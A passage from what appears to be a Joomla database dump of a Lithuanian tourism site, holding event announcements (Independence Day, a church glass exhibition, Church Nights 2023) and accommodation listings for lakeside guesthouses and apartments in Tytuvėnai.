00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/darb\\/darb.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,12,'','',1,2761,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(382,474,'Kovo 11-oji','kovo-11','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Kovo 11-oji – Lietuvos nepriklausomybės atkūrimo diena.</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> Lietuvos atkūrimo dienos minėjimo renginiai</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/kovo11/new/kovo11.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-03-07 21:47:40',135,'','2023-03-07 21:55:08',135,0,'0000-00-00 00:00:00','2023-03-07 21:47:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/kovo11\\/new\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,11,'','',1,2400,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(383,475,'Bažnyčių atspindžiai stikle','baznyciu-atspindziai-stikle','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span>Bažnyčių atspindžiai stikle</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> Parodos atidarymas 2023 04 05 18 val.</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/baznyciu_atspindziai_stikle/main_ok.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-03-27 19:26:20',135,'','2023-03-27 19:27:20',135,0,'0000-00-00 00:00:00','2023-03-27 19:26:20','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/baznyciu_atspindziai_stikle\\/mian.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,9,'','',1,2493,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(384,476,'Bažnyčių atspindžiai stikle','baznyciu-atspindziai-stikle-1','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Romarika Pikelienė:</strong> Bažnyčių atspindžiai stikle</span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2023 04 05 - 07 05</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/atspindziai/main.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-04-08 19:39:15',135,'','2023-04-08 19:42:10',135,0,'0000-00-00 00:00:00','2023-04-08 19:39:15','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/atspindziai\\/logo.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,10,'','',1,2733,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(385,477,'Tytuva\'23','tytuva-23','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Sugrįžo vaikai į gimtą kraštą</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2023 06 02 - 06 04</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/tytuva2023/tytuva2023d.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-05-18 04:50:40',135,'','2023-05-18 04:51:28',135,0,'0000-00-00 00:00:00','2023-05-18 04:50:40','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/tytuva2023\\/tytuva2023m.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,8,'','',1,2370,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(386,478,'Bažnyčių naktys 2023','baznyciu-naktys-2023','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Bažnyčių naktys Kelmės rajone</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2023 07 20 - 07 23</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/bnaktys23/kelme.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-07-12 19:36:53',135,'','2023-07-12 19:39:07',135,0,'0000-00-00 00:00:00','2023-07-12 19:36:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/bnaktys23\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,7,'','',1,2174,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(387,479,'Bažnyčių naktys 2023','baznyciu-naktys-2024','','<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span><strong>Bažnyčių naktys</strong></span></span></p>\r\n<p style=\"text-align: justify;\"><span style=\"color: #141823; font-family: Helvetica, Arial,\r\n      \'lucida grande\', tahoma, verdana, arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 18px; orphans: auto; text-align: left; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px; -webkit-text-stroke-width: 0px; display: inline !important; float: none; background-color: #ffffff;\"><span> 2023 07 20 - 07 23</span></span></p>\r\n','\r\n<p><strong><img src=\"images/stories/naujienos/bnaktys23/bendras.jpg\" border=\"0\" alt=\"\" /></strong></p>',1,0,0,44,'2023-07-12 19:36:53',135,'','2023-07-12 19:39:50',135,0,'0000-00-00 00:00:00','2023-07-12 19:36:53','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/bnaktys23\\/main.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,0,6,'','',1,2886,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(390,482,'Apgyvendinimas - Tytuvėnai','kur-apsistoti-2','','<p><strong><span>Piligrimų namai \"Domus Rafaeli\"</span></strong><span> {gallery cols=5 orientation=horizontal width=400}stories/apgyvendinimas/domus_rafaeli/{/gallery}</span></p>\r\n<p>Tytuvėnų bažnyčios ir vienuolyno ansamblio buvusiame XVII a. statytame svirne esančiuose piligrimų namuose ,,Domus Rafaeli‘‘ nuomojamos patalpos. Priimami pavieniai asmenys/grupės iki 26 asmenų. Skirtinguose patalpose gali įsikurti du, trys, penki ar dešimt asmenų. Garantuotas poilsis be išmaniųjų technologijų (nėra TV, interneto), vienoje pastato pusėje bažnyčia ir  vienuolynas, rožynas, kitoje – naujai sutvarkyta  tvenkinio teritorija.</p>\r\n<p>Adresas: Maironio g. 2A, Tytuvėnai, Kelmės r. (privažiavimas nuo piliakalnio g. 1, Tytuvėnai)</p>\r\n<p>Telefonas pasiteiravimui:+37067558506.</p>\r\n<p><span> </span></p>\r\n<p><iframe src=\"images/stories/apgyvendinimas/tytuvenai/zara/zara.pdf\" width=\"100%\" height=\"600\"></iframe></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p><strong><span>Giliaus elingas</span></strong><span> {gallery cols=5 orientation=horizontal width=400}stories/apgyvendinimas/tytuvenai/giliaus_elingas{/gallery}</span></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p><span style=\"text-decoration: underline;\">Giliaus Elingas</span></p>\r\n<p>Adresas: Maironio g. 55, Tytuvėnai, Kelmės r. sav.</p>\r\n<p><a href=\"mailto:giliausnendre@gmail.com\">giliausnendre@gmail.com</a></p>\r\n<p>+37060574784</p>\r\n<p align=\"center\">     Giliaus Elingas</p>\r\n<p><strong>E</strong>lingai (<a href=\"https://lt.wikipedia.org/wiki/Oland%C5%B3_kalba\" title=\"Olandų kalba\">ol.</a> helling) – <a href=\"https://lt.wikipedia.org/w/index.php?title=Laiv%C5%B3_statykla&amp;action=edit&amp;redlink=1\" title=\"Laivų statykla (puslapis neegzistuoja)\"> buvo statomi  valčių irklavimo stotyse, įvairių laivų prieplaukose, kur šie statiniai kaip garažai naudojami laikyti įvairioms vandens transporto priemonėms.</a> 2024 metus Giliaus Elingas pasitinka visiškai pakeitęs savo išvaizdą ir paskirtį. Šiuo metu yra pasiruošęs priimti nuo 2 iki 10 svečių, kurie ieško ramaus poilsio ir ryšio su gamta. Viskas sukurta taip, kad jaustumėtės patogiai, kokybiškai ir saugiai. Namelio viduje – šviesus, modernus, minimalistinis skandinaviško tipo inerjeras. Jauki svetainė su vaizdu į ežerą, kurioje rasite visą reikalingą buitinę techniką: viryklę, orkaitę, mikrobangų krosnelę, šaldytuvą, indaplovę, televizorių, kondicionierių, indus ir  puodus bei stalo įrankius.</p>\r\n<p>Pirmame aukšte įrengtas miegamasis su vaizdu į miško panoramą ir terasa, kurioje galėsite niekieno netrukdomi skaityti, pietauti, ištisus metus stebėti Giliaus ežerą išsiskiriantį savo ypatinga spalva ir didele augalijos bei gyvūnijos įvairove.</p>\r\n<p>Antrame aukšte rasite tris jaukius miegamuosius su patalyne, rankšluosčiais ir visais patogumais. Du išskirtiniai miegamieji su išėjimu į balkoną-terasą, kuriame galėsite mėgautis nuostabiais saulėlydžiais.</p>\r\n<p> </p>\r\n<p>PATOGUMAI</p>\r\n<p>4 atskiri miegamieji</p>\r\n<p>Pilnai įrengta virtuvė</p>\r\n<p>Poilsio zona</p>\r\n<p>4 WC patalpos</p>\r\n<p>Lauko terasa</p>\r\n<p>Lieptelis su maudykla</p>\r\n<p>Oro kondicionierius</p>\r\n<p>Televizorius</p>\r\n<p>WI-FI</p>\r\n<p>Šašlykinė</p>\r\n<p>Rankšluosčiai</p>\r\n<p>Patalynė</p>\r\n<p>Nemokama vieta automobiliui.</p>\r\n<p>Hidromasažinis kubilas už papildomą mokestį</p>\r\n<p>Valčių, vandens dviračių, irklenčių, baidarių nuoma.</p>\r\n<p> <span style=\"text-decoration-line: underline; font-size: 12.16px;\">Giliaus kupolas</span></p>\r\n<p>Adresas: Maironio g. 51, Tytuvėnai, Kelmės r. sav.</p>\r\n<p><a href=\"mailto:giliausnendre@gmail.com\">giliausnendre@gmail.com</a></p>\r\n<p>+37060574784</p>\r\n<p> <span style=\"font-size: 12.16px;\">     Tai nuostabus sprendimas norintiems savo renginį pažymėti kitaip, gamtos apsuptyje, pripildyta jaukia energija, sujungiant išskirtinumą bei netradicines erdves. Modernus </span><strong style=\"font-size: 12.16px;\">80 m<sup>2</sup> ploto kupolas su erdvia terasa</strong><span style=\"font-size: 12.16px;\">, kuri naktį apšviečiama specialiais šviestuvais. Šį, renginiams bei šventėms skirtą kompleksą sudaro kupolas su terasa, kuriame galėsime pastatyti baldus ir viską, ko jums prireiks. Nuo terasos galėsite grožėtis aplink esančiu mišku, pieva, ir greta tyvuliuojančiu ežeru.</span></p>\r\n<p><strong>     Galime suteikti nakvynę jaukiuose nameliuose, kurie yra greta prie pat ežero kranto.</strong></p>\r\n<p>Nameliai yra keturi ir juose gali nakvoti iki 40 žmonių.</p>\r\n<p> <strong style=\"font-size: 12.16px;\">Kupolo erdvė tiks:</strong></p>\r\n<ul>\r\n<li>vestuvėms;</li>\r\n<li>gimtadieniams;</li>\r\n<li>krikštynoms;</li>\r\n<li>verslo renginiams;</li>\r\n<li>konferencijoms;</li>\r\n<li>degustacijoms;</li>\r\n<li>edukacijoms;</li>\r\n<li>fotosesijoms;</li>\r\n</ul>\r\n<p><strong>Į kupolo nuomos kainą įskaičiuota:</strong></p>\r\n<ul>\r\n<li>Stalai – apvalūs arba pailgi.</li>\r\n<li>Kėdės arba suolai.</li>\r\n<li>Multimedija.</li>\r\n<li>Jaukus apšvietimas.</li>\r\n<li>Mini šaldytuvas</li>\r\n</ul>\r\n<p> <strong style=\"font-size: 12.16px;\">Papildomai mokama atributika ir priemonės:</strong></p>\r\n<ul>\r\n<li>Garso aparatūra</li>\r\n<li>Kavos apartas</li>\r\n<li>Pastatomi šildytuvai lempos (vėsiuoju laikotarpiu)</li>\r\n<li>Stalo serviravimas</li>\r\n<li>Teritorijos dekoravimas</li>\r\n</ul>\r\n<p><span style=\"text-decoration-line: underline; font-size: 12.16px;\">Giliaus namelis</span></p>\r\n<p><span style=\"font-size: 12.16px;\">Talpina iki 12-kos asmenų.  Dviejų aukštų rąstinis namelis su pirtimi ir sūkurine vonia, kur bet kuriuo metų laiku jaukiai ir maloniai galite leisti laiką ir rengti įsimintinas šventes. Jis stovi Gilio ežere ant medinių ąžuolinių polių. Mūsų žiniomis tai vienintelis tokio tipo su visais patogumais statinys ant vandens. Viskas įrengta taip, kad Jums nieko netrūktų. Šviesi, šiuolaikiškai įrengta svetainė kartu su valgomojo ir virtuvės zona jaukiam apsistojimui tiek trumpai ar ilgesnei viešnagei. Virtuvėje yra visa reikalinga buitine technika (šaldytuvas, mikrobangų krosnelė, viryklė, indaplovė, televizoriai). Namo pirmajame aukšte įrengta suomiška pirtis su garu, dušais, sanitariniais mazgais ir priepirčiu. Pirmas aukštas yra pritaikytas neįgaliems, yra dvigulė sofa-lova, kurioje galima patogiai išsimiegoti. Antrame namo aukšte du atskiri kambariai su WC ir dušais, dvigulės arba viengulės atskiros lovos. Čia taip pat rasite būtinus higienos reikmenis, rankšluosčius, patalynę plaukų džiovintuvus, šlepetes, ir dantų šepetėlius. Visuose kambariuose yra televizoriai ir nemokamas bevielis internetas. Lauko terasoje galėsite mėgautis nepakartojamo grožio Gilio ežero gamtovaizdžiu, o maistą ruošti kepsninėje. Jei norite atsipalaiduoti ar sustiprinti sveikatą – kviečiame išmėginti karšto arba šalto vandens lauko kubilą! Taip pat turime įvairių pramogų galėsite žvejoti, plaukioti valtele, irklente ar net burlente. Užtikriname aukščiausio lygio švarą patalpose. Mes jūsų laukiame visus metus: tiek žiemą, tiek vasarą. Tai išskirtinė vieta, kurioje dera ramaus laisvalaikio ir civilizacijos teikiami malonumai.</span></p>\r\n<p> <span style=\"font-size: 12.16px;\">PATOGUMAI</span></p>\r\n<p>2 atskiri miegamieji kambariai</p>\r\n<p>Pilnai įrengta virtuvė</p>\r\n<p>4 WC patalpos</p>\r\n<p>Lauko terasa</p>\r\n<p>Oro kondicionierius</p>\r\n<p>Televizorius</p>\r\n<p>WI-FI</p>\r\n<p>Šašlykinė</p>\r\n<p>Patalynė</p>\r\n<p>Rankšluosčiai</p>\r\n<p>Privati maudykla</p>\r\n<p>Sauna už papildomą mokestį</p>\r\n<p>Sūkurinė vonia už papildomą mokestį</p>\r\n<p>Augintiniai priimami už papildomą mokestį</p>\r\n<p>Nemokama vieta automobiliui</p>\r\n<p>Valčių, vandens dviračių, irklenčių, baidarių nuoma.</p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p> </p>\r\n<p style=\"text-align: justify;\"><strong style=\"font-size: 12.16px;\"><span style=\"font-size: large;\">Apartamentai Tytuvėnuose</span></strong><span style=\"font-size: 12.16px;\"> {gallery cols=5 orientation=horizontal width=400}stories/apgyvendinimas/tytuvenai/laima{/gallery}</span></p>\r\n<p>Tytuvėnų miesto centre, vos kelios minutės kelio pėsčiomis iki Tytuvėnų bažnyčios ir vienuolyno, siūlome apartamentus skirtus apsistoti iki 4 svečių. Tai yra dviejų kambarių butas su balkonu ir virtuve. Abiejuose kambariuose yra po televizorių, veikia belaidis internetas. Svečiams paruošta patalynė, rankšluosčiai.<br />Yra skalbimo mašina.<br />Virtuvėje yra visa, kas reikalinga: indai, įrankiai, puodai, keptuvė, orkaitė, kaitlentė, <br />mikrobangų krosnelė, arbatinukas, šaldytuvas.<br />Esame draugiški svečių augintiniams.</p>\r\n<p>Adresas:</p>\r\n<p>Maironio g. 4A-30, Tytuvėnai, Kelmės r.</p>\r\n<p>Tel. +37061522469 Laima</p>\r\n<p>El. paštas: <a href=\"mailto:laiiva.laima@gmail.com\">laiiva.laima@gmail.com</a></p>\r\n<p style=\"text-align: justify;\"> </p>\r\n<p><strong><span>Apartamentai „Tarp trijų ežerų“</span></strong><span> {gallery cols=5 orientation=horizontal width=400}stories/apgyvendinimas/tytuvenai/tarp3e{/gallery}</span></p>\r\n<p>Tytuvėnų miesto centre, 500 metrų iki Bridvaišio ežero, siūlome apsistoti jaukiai įrengtame privačiame gyvenamajame name su kiemeliu ir terasa. Svečiams siūlome keturvietį kambarį, kuriame yra dvi atskiros lovos (jas galima sustumti) ir išskleidžiamas dvigulis fotelis, dvivietį - su dviem atskiromis lovomis, kurias taip pat galima sustumti ir dvivietį su dvigule lova. Galime priimti iki 8 svečių. Svečiams yra patalynė ir rankšluosčiai, kambariuose yra televizoriai, belaidis internetas. Šiems kambariams skirta bendra virtuvė, kurioje yra visa, kas reikalinga: šaldytuvas, mikrobangų krosnelė, kaitlentė, orkaitė, indaplovė, visi reikalingi indai, įrankiai, puodai.</p>\r\n<p>Galima naudotis skalbimo mašina.<br />Uždarame kiemelyje yra pavėsinė, supynės, galima naudotis kepsnine.<br />Yra vieta automobiliams, garažas motociklams ar dviračiams.<br />Esame draugiški svečių augintiniams.</p>\r\n<p>Adresas:</p>\r\n<p>Skogalio g. 15, Tytuvėnai, Kelmės r.</p>\r\n<p>Tel. +37061522469</p>\r\n<p>El. paštas: <a href=\"mailto:laiiva.laima@gmail.com\">laiiva.laima@gmail.com</a></p>\r\n<p>Facebook paskyra: <a href=\"https://www.facebook.com/TarpTrijuEzeru\" target=\"_blank\">https://www.facebook.com/TarpTrijuEzeru</a></p>\r\n<p> </p>','',1,0,0,52,'2011-04-14 10:48:58',135,'','2024-06-18 13:32:49',135,0,'0000-00-00 00:00:00','2011-04-14 10:48:58','0000-00-00 